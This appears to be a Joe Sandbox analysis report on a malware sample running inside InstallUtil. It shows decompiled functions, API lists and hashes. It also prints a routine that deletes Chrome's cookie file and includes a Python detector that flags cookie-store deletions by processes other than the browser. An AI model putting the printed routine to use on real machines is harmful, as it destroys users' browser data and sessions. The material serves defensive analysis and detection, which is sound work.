                                                                      				void* _t28;
                                                                      
                                                                      				if( *0x46c090 != 0xffffffff) {
                                                                      					_t25 = GetLastError();
                                                                      					_t11 = E00435718(__eflags,  *0x46c090);
                                                                      					__eflags = _t11 - 0xffffffff;
                                                                      					if(_t11 == 0xffffffff) {
                                                                      						L5:
                                                                      						_t11 = 0;
                                                                      					} else {
                                                                      						__eflags = _t11;
                                                                      						if(__eflags == 0) {
                                                                      							_t4 = E00435752(__eflags,  *0x46c090, 0xffffffff);
                                                                      							_pop(_t16);
                                                                      							__eflags = _t4;
                                                                      							if(_t4 != 0) {
                                                                      								_t28 = E00441BB3(_t16, 1, 0x28);
                                                                      								__eflags = _t28;
                                                                      								if(__eflags == 0) {
                                                                      									L8:
                                                                      									_t11 = 0;
                                                                      									E00435752(__eflags,  *0x46c090, 0);
                                                                      								} else {
                                                                      									__eflags = E00435752(__eflags,  *0x46c090, _t28);
                                                                      									if(__eflags != 0) {
                                                                      										_t11 = _t28;
                                                                      										_t28 = 0;
                                                                      										__eflags = 0;
                                                                      									} else {
                                                                      										goto L8;
                                                                      									}
                                                                      								}
                                                                      								E004427C2(_t28);
                                                                      							} else {
                                                                      								goto L5;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					SetLastError(_t25);
                                                                      					return _t11;
                                                                      				} else {
                                                                      					return 0;
                                                                      				}
                                                                      			}

                                                                      Instruction addresses (one per C-code line): 0x00436c9e, 0x00436cb1, 0x00436cb8, 0x00436cbb, 0x00436cbe, 0x00436cd7, 0x00436cd7, 0x00436cc0,
                                                                      0x00436cc0, 0x00436cc2, 0x00436ccc, 0x00436cd2, 0x00436cd3, 0x00436cd5, 0x00436ce5, 0x00436ce9, 0x00436ceb, 0x00436cff, 0x00436cff, 0x00436d08,
                                                                      0x00436ced, 0x00436cfb, 0x00436cfd, 0x00436d11, 0x00436d13, 0x00436d13, 0x00000000, 0x00000000, 0x00000000, 0x00436cfd, 0x00436d16, 0x00000000,
                                                                      0x00000000, 0x00000000, 0x00436cd5, 0x00436cc2, 0x00436d1e, 0x00436d28, 0x00436ca0, 0x00436ca2, 0x00436ca2

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00436C8E,00435BCE), ref: 00436CA5
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00436CB3
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00436CCC
                                                                      • SetLastError.KERNEL32(00000000,?,00436C8E,00435BCE), ref: 00436D1E
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: 340dec9bad919ad146e11d0d3378a8005c767dfedaf6d62dffeb65ea64cab27a
                                                                      • Instruction ID: afa554c1e68ac18853916ae9bddde49054fb155561a47c4889e0264719c4959e
                                                                      • Opcode Fuzzy Hash: 340dec9bad919ad146e11d0d3378a8005c767dfedaf6d62dffeb65ea64cab27a
                                                                      • Instruction Fuzzy Hash: 5301F132208713AEA61427B96CC5A272684EB0977DF31623FF628452E1EF9948415A4D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E0040A135(void* __edx, void* __edi, void* __eflags) {
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				long _t18;
                                                                      				void* _t20;
                                                                      				void* _t21;
                                                                      				void* _t28;
                                                                      				void* _t32;
                                                                      				void* _t33;
                                                                      				void* _t34;
                                                                      
                                                                      				_t37 = __eflags;
                                                                      				_t32 = __edi;
                                                                      				_t31 = E00402053(_t20,  &_v52, __edx, _t33, E00438A1A(_t20, __eflags, "UserProfile"));
                                                                      				E0040793B(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                                                                      				E00401F98();
                                                                      				if(DeleteFileA(E00401F6B( &_v28)) != 0) {
                                                                      					_t28 = _t34 - 0x18;
                                                                      					_push("\n[Chrome Cookies found, cleared!]");
                                                                      					goto L6;
                                                                      				} else {
                                                                      					_t18 = GetLastError();
                                                                      					if(_t18 == 0 || _t18 == 1) {
                                                                      						_t28 = _t34 - 0x18;
                                                                      						_push("\n[Chrome Cookies not found]");
                                                                      						L6:
                                                                      						E00402053(_t20, _t28, _t31, _t33);
                                                                      						E0040A863(_t20, _t31, _t33, __eflags);
                                                                      						_t21 = 1;
                                                                      					} else {
                                                                      						_t21 = 0;
                                                                      					}
                                                                      				}
                                                                      				E00401F98();
                                                                      				return _t21;
                                                                      			}

                                                                      Instruction addresses (one per C-code line): 0x0040a135, 0x0040a135, 0x0040a155, 0x0040a15a, 0x0040a163, 0x0040a179, 0x0040a19f, 0x0040a1a1,
                                                                      0x00000000, 0x0040a17b, 0x0040a182, 0x0040a185, 0x0040a193, 0x0040a195, 0x0040a1a6, 0x0040a1a6, 0x0040a1ab, 0x0040a1b0, 0x0040a18c, 0x0040a18c,
                                                                      0x0040a18c, 0x0040a185, 0x0040a1b8, 0x0040a1c3

                                                                      APIs
                                                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040A171
                                                                      • GetLastError.KERNEL32 ref: 0040A17B
                                                                      Strings
                                                                      • [Chrome Cookies found, cleared!], xrefs: 0040A1A1
                                                                      • [Chrome Cookies not found], xrefs: 0040A195
                                                                      • UserProfile, xrefs: 0040A141
                                                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A13C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteErrorFileLast
                                                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                      • API String ID: 2018770650-304995407
                                                                      • Opcode ID: e608f3ab0a2893a21307e1549365164004f70cd7f67394e48dcbd4e608d21d34
                                                                      • Instruction ID: b15e823080d4bc2bf0f2b47e97ad8a06341ae1548828daf060ed6f6c7c3f7e53
                                                                      • Opcode Fuzzy Hash: e608f3ab0a2893a21307e1549365164004f70cd7f67394e48dcbd4e608d21d34
                                                                      • Instruction Fuzzy Hash: 3B01F271A442056BCB04BB76DC1B8BE7724A922748F58027FF4027A1E2FD79481686CF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
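The routine above is the sample's Chrome cookie wipe: it appends a fixed suffix to the UserProfile environment value, calls DeleteFileA on the result, and logs one of two strings depending on the outcome. A practitioner will want to exercise that decision logic without running the sample and to turn the hard-coded path into a detection. The Python block below is an added example written for this report; it is not code from the sample or from Joe Sandbox. It assumes Sysmon FileDelete telemetry (Event ID 23/26) with Image and TargetFilename fields, constructs its own sample events, and deliberately matches more than the sample does (any Chrome profile directory, and the newer Network\Cookies store as well as the legacy Default\Cookies one). One caveat it carries as a comment: the decompilation compares GetLastError() against 0 and 1, whereas a missing file yields ERROR_FILE_NOT_FOUND (2); with the decompiler reporting 82% quality, confirm the exact constants in the disassembly before relying on them.

```python
"""
Triage helpers for the cookie-clearing routine E0040A135 above.

Added example; not code from the Joe Sandbox report or from the sample.
Part 1 mirrors the decompiled decision logic so its branches can be
exercised without running the malware. Part 2 is detection logic run
over constructed Sysmon-style FileDelete events (fields Image and
TargetFilename). It generalises beyond the sample: any Chrome profile
directory, and the Network\\Cookies store as well as Default\\Cookies.
"""
import ntpath
import re
from typing import List, Optional

# Suffix appended to %UserProfile%, exactly as in the decompiled routine.
CHROME_COOKIES_SUFFIX = r"\AppData\Local\Google\Chrome\User Data\Default\Cookies"

# Win32 error codes from winerror.h. The decompilation tests GetLastError()
# against 0 and 1; a "file missing" check would normally test 2 or 3, so
# treat the recovered constants with the 82% decompiler quality in mind.
ERROR_SUCCESS = 0
ERROR_INVALID_FUNCTION = 1
ERROR_FILE_NOT_FOUND = 2
ERROR_PATH_NOT_FOUND = 3

LOG_CLEARED = "[Chrome Cookies found, cleared!]"
LOG_NOT_FOUND = "[Chrome Cookies not found]"


def chrome_cookie_path(user_profile: str) -> str:
    """Build the path the routine hands to DeleteFileA."""
    return user_profile.rstrip("\\") + CHROME_COOKIES_SUFFIX


def classify_delete_result(delete_ok: bool, last_error: int) -> Optional[str]:
    """Return the log line the routine emits for a DeleteFileA outcome,
    or None where the decompilation returns 0 without logging anything."""
    if delete_ok:
        return LOG_CLEARED
    if last_error in (ERROR_SUCCESS, ERROR_INVALID_FUNCTION):
        return LOG_NOT_FOUND
    return None


# Part 2: detection over FileDelete telemetry.
# Chrome itself legitimately rewrites its cookie store; any other image is suspect.
BROWSER_IMAGES = {"chrome.exe"}

CHROME_COOKIE_STORE = re.compile(
    r"\\AppData\\Local\\Google\\Chrome\\User Data\\[^\\]+\\(?:Network\\)?Cookies$",
    re.IGNORECASE,
)


def suspicious_cookie_deletions(events: List[dict]) -> List[dict]:
    """Return events where a non-browser process deleted a Chrome cookie store."""
    hits = []
    for ev in events:
        image = ntpath.basename(ev.get("Image", "")).lower()
        target = ev.get("TargetFilename", "")
        if CHROME_COOKIE_STORE.search(target) and image not in BROWSER_IMAGES:
            hits.append(ev)
    return hits


# Constructed events, not taken from the report. The InstallUtil.exe path is
# the stock .NET Framework location; the report's snapshot name shows the
# Remcos payload running inside InstallUtil.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Profile 1\Network\Cookies"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\Users\victim\Desktop\notes.txt"},
]

if __name__ == "__main__":
    print(chrome_cookie_path(r"C:\Users\victim"))
    for ev in suspicious_cookie_deletions(SAMPLE_EVENTS):
        print("suspicious:", ev["Image"], "->", ev["TargetFilename"])
```

Run stand-alone it prints the reconstructed path and the two suspicious events (InstallUtil.exe and powershell.exe); in practice feed it the parsed event stream, and extend BROWSER_IMAGES and the regex if other Chromium-based browsers' cookie stores are in scope.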

                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043F3CA,00000000,?,0043F36A,00000000,004691D8,0000000C,0043F4C1,00000000,00000002), ref: 0043F439
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043F44C
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0043F3CA,00000000,?,0043F36A,00000000,004691D8,0000000C,0043F4C1,00000000,00000002), ref: 0043F46F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: <@$CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-3160931098
                                                                      • Opcode ID: c7c3b52585d8abc81870ef7c7e7cb90fe1270fa6735809de8167db2ea3ee4d06
                                                                      • Instruction ID: 0065de99dbaa4e5e538e5e9a5c63d0a393c0099867ddae68623e82f655967173
                                                                      • Opcode Fuzzy Hash: c7c3b52585d8abc81870ef7c7e7cb90fe1270fa6735809de8167db2ea3ee4d06
                                                                      • Instruction Fuzzy Hash: 64F0CD31A00308FBCB105F54DC09B9EBFB4EF44716F104079F805A6151DF348E84CA58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 69%
                                                                      			E0043741C(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
                                                                      				intOrPtr _v0;
                                                                      				char _v8;
                                                                      				signed int _v12;
                                                                      				char _v16;
                                                                      				signed int _v20;
                                                                      				char _v24;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t61;
                                                                      				void* _t64;
                                                                      				signed int _t67;
                                                                      				signed int _t69;
                                                                      				signed int _t70;
                                                                      				signed int _t73;
                                                                      				signed int _t75;
                                                                      				signed int _t77;
                                                                      				signed int _t78;
                                                                      				intOrPtr _t80;
                                                                      				signed int _t81;
                                                                      				void* _t82;
                                                                      				signed int _t84;
                                                                      				void* _t85;
                                                                      				signed int _t87;
                                                                      				signed int _t93;
                                                                      				signed int _t102;
                                                                      				void* _t104;
                                                                      				signed int _t107;
                                                                      				signed int* _t110;
                                                                      				signed int* _t111;
                                                                      				intOrPtr* _t113;
                                                                      				signed int _t118;
                                                                      				signed int _t120;
                                                                      				signed int _t123;
                                                                      				void* _t125;
                                                                      				signed int _t128;
                                                                      				signed int _t131;
                                                                      				signed int _t139;
                                                                      				signed int _t145;
                                                                      				void _t147;
                                                                      				void* _t148;
                                                                      				void* _t150;
                                                                      				void* _t152;
                                                                      				signed int _t153;
                                                                      				signed int _t154;
                                                                      				void* _t155;
                                                                      				signed int _t156;
                                                                      				signed int _t157;
                                                                      				signed int _t158;
                                                                      				intOrPtr _t159;
                                                                      
                                                                      				_t139 = __edx;
                                                                      				_t155 = _a4;
                                                                      				if(_t155 == 0) {
                                                                      					_t113 = E00439941();
                                                                      					_t159 = 0x16;
                                                                      					 *_t113 = _t159;
                                                                      					E0043862C();
                                                                      					return _t159;
                                                                      				}
                                                                      				_push(__edi);
                                                                      				_t123 = 9;
                                                                      				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
                                                                      				_t145 = _a8;
                                                                      				__eflags = _t145;
                                                                      				if(_t145 == 0) {
                                                                      					_t111 = E00439941();
                                                                      					_t158 = 0x16;
                                                                      					 *_t111 = _t158;
                                                                      					E0043862C();
                                                                      					_t78 = _t158;
                                                                      					L12:
                                                                      					return _t78;
                                                                      				}
                                                                      				_push(__ebx);
                                                                      				__eflags =  *(_t145 + 4);
                                                                      				if(__eflags <= 0) {
                                                                      					if(__eflags < 0) {
                                                                      						L10:
                                                                      						_t110 = E00439941();
                                                                      						_t157 = 0x16;
                                                                      						 *_t110 = _t157;
                                                                      						_t78 = _t157;
                                                                      						L11:
                                                                      						goto L12;
                                                                      					}
                                                                      					__eflags =  *_t145;
                                                                      					if( *_t145 < 0) {
                                                                      						goto L10;
                                                                      					}
                                                                      				}
                                                                      				_t64 = 7;
                                                                      				__eflags =  *(_t145 + 4) - _t64;
                                                                      				if(__eflags >= 0) {
                                                                      					if(__eflags > 0) {
                                                                      						goto L10;
                                                                      					}
                                                                      					__eflags =  *_t145 - 0x93406fff;
                                                                      					if(__eflags > 0) {
                                                                      						goto L10;
                                                                      					}
                                                                      				}
                                                                      				E004455E0(0, _t145, _t155, __eflags);
                                                                      				_v12 = 0;
                                                                      				_v16 = 0;
                                                                      				_v8 = 0;
                                                                      				_t67 = E00444E15( &_v12);
                                                                      				_pop(_t125);
                                                                      				__eflags = _t67;
                                                                      				if(_t67 == 0) {
                                                                      					_t75 = E00444E41( &_v16);
                                                                      					_pop(_t125);
                                                                      					__eflags = _t75;
                                                                      					if(_t75 == 0) {
                                                                      						_t77 = E00444E6D( &_v8);
                                                                      						_pop(_t125);
                                                                      						__eflags = _t77;
                                                                      						if(_t77 == 0) {
                                                                      							_t118 =  *(_t145 + 4);
                                                                      							_t128 =  *_t145;
                                                                      							__eflags = _t118;
                                                                      							if(__eflags < 0) {
                                                                      								L28:
                                                                      								_push(_t145);
                                                                      								_push(_t155);
                                                                      								_t78 = E0043EB17();
                                                                      								__eflags = _t78;
                                                                      								if(_t78 != 0) {
                                                                      									goto L11;
                                                                      								}
                                                                      								__eflags = _v12;
                                                                      								asm("cdq");
                                                                      								_t147 =  *_t155;
                                                                      								_t120 = _t139;
                                                                      								if(__eflags == 0) {
                                                                      									L32:
                                                                      									_t80 = _v8;
                                                                      									L33:
                                                                      									asm("cdq");
                                                                      									_t148 = _t147 - _t80;
                                                                      									asm("sbb ebx, edx");
                                                                      									_t81 = E00453360(_t148, _t120, 0x3c, 0);
                                                                      									 *_t155 = _t81;
                                                                      									__eflags = _t81;
                                                                      									if(_t81 < 0) {
                                                                      										_t148 = _t148 + 0xffffffc4;
                                                                      										 *_t155 = _t81 + 0x3c;
                                                                      										asm("adc ebx, 0xffffffff");
                                                                      									}
                                                                      									_t82 = E004532B0(_t148, _t120, 0x3c, 0);
                                                                      									_t121 = _t139;
                                                                      									_t28 = _t155 + 4; // 0x848d0046
                                                                      									asm("cdq");
                                                                      									_t150 = _t82 +  *_t28;
                                                                      									asm("adc ebx, edx");
                                                                      									_t84 = E00453360(_t150, _t139, 0x3c, 0);
                                                                      									 *(_t155 + 4) = _t84;
                                                                      									__eflags = _t84;
                                                                      									if(_t84 < 0) {
                                                                      										_t150 = _t150 + 0xffffffc4;
                                                                      										 *(_t155 + 4) = _t84 + 0x3c;
                                                                      										asm("adc ebx, 0xffffffff");
                                                                      									}
                                                                      									_t85 = E004532B0(_t150, _t121, 0x3c, 0);
                                                                      									_t122 = _t139;
                                                                      									_t31 = _t155 + 8; // 0xa824
                                                                      									asm("cdq");
                                                                      									_t152 = _t85 +  *_t31;
                                                                      									asm("adc ebx, edx");
                                                                      									_t87 = E00453360(_t152, _t139, 0x18, 0);
                                                                      									 *(_t155 + 8) = _t87;
                                                                      									__eflags = _t87;
                                                                      									if(_t87 < 0) {
                                                                      										_t152 = _t152 + 0xffffffe8;
                                                                      										 *(_t155 + 8) = _t87 + 0x18;
                                                                      										asm("adc ebx, 0xffffffff");
                                                                      									}
                                                                      									_t131 = E004532B0(_t152, _t122, 0x18, 0);
                                                                      									__eflags = _t139;
                                                                      									if(__eflags < 0) {
                                                                      										L48:
                                                                      										_t44 = _t155 + 0x18; // 0xa024848d
                                                                      										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
                                                                      										asm("cdq");
                                                                      										_t153 = 7;
                                                                      										_t51 = _t155 + 0xc; // 0x50506a00
                                                                      										_t93 =  *_t51;
                                                                      										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
                                                                      										__eflags = _t93;
                                                                      										if(_t93 > 0) {
                                                                      											goto L43;
                                                                      										}
                                                                      										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
                                                                      										 *(_t155 + 0xc) = _t93 + 0x1f;
                                                                      										_t55 = _t131 + 0x16d; // 0x16d
                                                                      										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
                                                                      										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
                                                                      										goto L44;
                                                                      									} else {
                                                                      										if(__eflags > 0) {
                                                                      											L42:
                                                                      											_t34 = _t155 + 0x18; // 0xa024848d
                                                                      											asm("cdq");
                                                                      											_t154 = 7;
                                                                      											_t39 = _t155 + 0xc;
                                                                      											 *_t39 =  *(_t155 + 0xc) + _t131;
                                                                      											__eflags =  *_t39;
                                                                      											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
                                                                      											L43:
                                                                      											_t42 = _t155 + 0x1c;
                                                                      											 *_t42 =  *(_t155 + 0x1c) + _t131;
                                                                      											__eflags =  *_t42;
                                                                      											L44:
                                                                      											_t78 = 0;
                                                                      											goto L11;
                                                                      										}
                                                                      										__eflags = _t131;
                                                                      										if(_t131 == 0) {
                                                                      											__eflags = _t139;
                                                                      											if(__eflags > 0) {
                                                                      												goto L44;
                                                                      											}
                                                                      											if(__eflags < 0) {
                                                                      												goto L48;
                                                                      											}
                                                                      											__eflags = _t131;
                                                                      											if(_t131 >= 0) {
                                                                      												goto L44;
                                                                      											}
                                                                      											goto L48;
                                                                      										}
                                                                      										goto L42;
                                                                      									}
                                                                      								}
                                                                      								_push(_t155);
                                                                      								_t102 = E00445631(_t120, _t147, _t155, __eflags);
                                                                      								__eflags = _t102;
                                                                      								if(_t102 == 0) {
                                                                      									goto L32;
                                                                      								}
                                                                      								_t80 = _v8 + _v16;
                                                                      								 *((intOrPtr*)(_t155 + 0x20)) = 1;
                                                                      								goto L33;
                                                                      							}
                                                                      							if(__eflags > 0) {
                                                                      								L20:
                                                                      								_t104 = 7;
                                                                      								__eflags = _t118 - _t104;
                                                                      								if(__eflags > 0) {
                                                                      									goto L28;
                                                                      								}
                                                                      								if(__eflags < 0) {
                                                                      									L23:
                                                                      									asm("cdq");
                                                                      									_push( &_v24);
                                                                      									asm("sbb ebx, edx");
                                                                      									_v24 = _t128 - _v8;
                                                                      									_push(_t155);
                                                                      									_v20 = _t118;
                                                                      									_t78 = E0043EB17();
                                                                      									__eflags = _t78;
                                                                      									if(_t78 != 0) {
                                                                      										goto L11;
                                                                      									}
                                                                      									__eflags = _v12 - _t78;
                                                                      									if(__eflags == 0) {
                                                                      										goto L44;
                                                                      									}
                                                                      									_push(_t155);
                                                                      									_t107 = E00445631(_t118, _t145, _t155, __eflags);
                                                                      									__eflags = _t107;
                                                                      									if(_t107 == 0) {
                                                                      										goto L44;
                                                                      									}
                                                                      									asm("cdq");
                                                                      									_v24 = _v24 - _v16;
                                                                      									_push( &_v24);
                                                                      									asm("sbb [ebp-0x10], edx");
                                                                      									_push(_t155);
                                                                      									_t78 = E0043EB17();
                                                                      									__eflags = _t78;
                                                                      									if(_t78 != 0) {
                                                                      										goto L11;
                                                                      									}
                                                                      									 *((intOrPtr*)(_t155 + 0x20)) = 1;
                                                                      									goto L44;
                                                                      								}
                                                                      								__eflags = _t128 - 0x933c7b7f;
                                                                      								if(_t128 >= 0x933c7b7f) {
                                                                      									goto L28;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      							__eflags = _t128 - 0x3f480;
                                                                      							if(_t128 <= 0x3f480) {
                                                                      								goto L28;
                                                                      							}
                                                                      							goto L20;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				E00438659();
                                                                      				asm("int3");
                                                                      				_push(_t155);
                                                                      				_t69 = E0043EAB2(_t125);
                                                                      				_t156 = _t69;
                                                                      				__eflags = _t156;
                                                                      				if(_t156 != 0) {
                                                                      					_push(_v0);
                                                                      					_t70 = E0043741C(0, _t139, _t145, _t156);
                                                                      					asm("sbb eax, eax");
                                                                      					_t73 =  !( ~_t70) & _t156;
                                                                      					__eflags = _t73;
                                                                      					return _t73;
                                                                      				}
                                                                      				return _t69;
                                                                      			}
                                                                      0x0043764b
                                                                      0x0043764b
                                                                      0x0043764e
                                                                      0x00437651
                                                                      0x00437651
                                                                      0x00437651
                                                                      0x00437651
                                                                      0x00437654
                                                                      0x00437654
                                                                      0x00000000
                                                                      0x00437654
                                                                      0x0043763c
                                                                      0x0043763e
                                                                      0x0043765b
                                                                      0x0043765d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043765f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00437661
                                                                      0x00437663
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00437663
                                                                      0x00000000
                                                                      0x0043763e
                                                                      0x00437638
                                                                      0x00437581
                                                                      0x00437582
                                                                      0x00437588
                                                                      0x0043758a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043758f
                                                                      0x00437592
                                                                      0x00000000
                                                                      0x00437592
                                                                      0x004374e4
                                                                      0x004374ee
                                                                      0x004374f0
                                                                      0x004374f1
                                                                      0x004374f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004374f5
                                                                      0x004374ff
                                                                      0x00437502
                                                                      0x00437508
                                                                      0x00437509
                                                                      0x0043750b
                                                                      0x0043750e
                                                                      0x0043750f
                                                                      0x00437512
                                                                      0x00437519
                                                                      0x0043751b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00437521
                                                                      0x00437524
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043752a
                                                                      0x0043752b
                                                                      0x00437531
                                                                      0x00437533
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043753c
                                                                      0x0043753d
                                                                      0x00437543
                                                                      0x00437544
                                                                      0x00437547
                                                                      0x00437548
                                                                      0x0043754f
                                                                      0x00437551
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00437557
                                                                      0x00000000
                                                                      0x00437557
                                                                      0x004374f7
                                                                      0x004374fd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004374fd
                                                                      0x004374e6
                                                                      0x004374ec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004374ec
                                                                      0x004374d5
                                                                      0x004374c3
                                                                      0x0043769b
                                                                      0x0043769c
                                                                      0x0043769d
                                                                      0x0043769e
                                                                      0x0043769f
                                                                      0x004376a0
                                                                      0x004376a5
                                                                      0x004376ab
                                                                      0x004376ac
                                                                      0x004376b1
                                                                      0x004376b3
                                                                      0x004376b5
                                                                      0x004376b7
                                                                      0x004376bb
                                                                      0x004376c3
                                                                      0x004376c8
                                                                      0x004376c8
                                                                      0x00000000
                                                                      0x004376c8
                                                                      0x004376cc

                                                                      APIs
                                                                      • __allrem.LIBCMT ref: 004375A9
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004375C5
                                                                      • __allrem.LIBCMT ref: 004375DC
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004375FA
                                                                      • __allrem.LIBCMT ref: 00437611
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043762F
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 1992179935-0
                                                                      • Opcode ID: f3342e1a3d51c19cfa4325d5d04a5a1bc8e815df67230c373c4fd9eaec09afd2
                                                                      • Instruction ID: 392012ef54fba666c7a04b8df7cec2ce0ca1ac78152d597fc0bfc278a376c8f6
                                                                      • Opcode Fuzzy Hash: f3342e1a3d51c19cfa4325d5d04a5a1bc8e815df67230c373c4fd9eaec09afd2
                                                                      • Instruction Fuzzy Hash: 4B814CB1604B05ABE7349E6DCC82B5B77A8AF59334F20512FF451D7782E778E9008748
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E004419B9(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                      				signed int _v8;
                                                                      				char _v32;
                                                                      				intOrPtr _v36;
                                                                      				intOrPtr _v40;
                                                                      				char* _v44;
                                                                      				char _v48;
                                                                      				void* __ecx;
                                                                      				signed int _t67;
                                                                      				signed int _t70;
                                                                      				signed int _t71;
                                                                      				signed int _t75;
                                                                      				intOrPtr _t76;
                                                                      				signed int _t79;
                                                                      				signed int _t86;
                                                                      				intOrPtr _t88;
                                                                      				signed int _t99;
                                                                      				void* _t101;
                                                                      				void* _t103;
                                                                      				void* _t108;
                                                                      				signed int _t112;
                                                                      				signed int _t113;
                                                                      				signed int _t116;
                                                                      				signed int _t123;
                                                                      				signed int _t125;
                                                                      				intOrPtr _t126;
                                                                      				signed int _t128;
                                                                      				intOrPtr _t130;
                                                                      				signed int _t131;
                                                                      				void* _t135;
                                                                      				void* _t136;
                                                                      				void* _t138;
                                                                      
                                                                      				_t120 = __edx;
                                                                      				_t97 = __ebx;
                                                                      				_push(_t101);
                                                                      				if(_a8 != 0) {
                                                                      					_push(__esi);
                                                                      					_push(__edi);
                                                                      					_t123 = 0;
                                                                      					_t67 = E0043A251( &_v8, 0, 0, _a8, 0x7fffffff);
                                                                      					_t136 = _t135 + 0x14;
                                                                      					__eflags = _t67;
                                                                      					if(_t67 == 0) {
                                                                      						L5:
                                                                      						_t128 = E00441BB3(_t101, _v8, 2);
                                                                      						_pop(_t103);
                                                                      						__eflags = _t128;
                                                                      						if(_t128 == 0) {
                                                                      							L11:
                                                                      							E004427C2(_t128);
                                                                      							_t70 = _t123;
                                                                      							goto L12;
                                                                      						} else {
                                                                      							_t71 = E0043A251(_t123, _t128, _v8, _a8, 0xffffffff);
                                                                      							_t136 = _t136 + 0x14;
                                                                      							__eflags = _t71;
                                                                      							if(_t71 == 0) {
                                                                      								_t123 = E00440D3B(_t97, _t103, _t120, _a4, _t128);
                                                                      								goto L11;
                                                                      							} else {
                                                                      								__eflags = _t71 - 0x16;
                                                                      								if(_t71 == 0x16) {
                                                                      									goto L13;
                                                                      								} else {
                                                                      									__eflags = _t71 - 0x22;
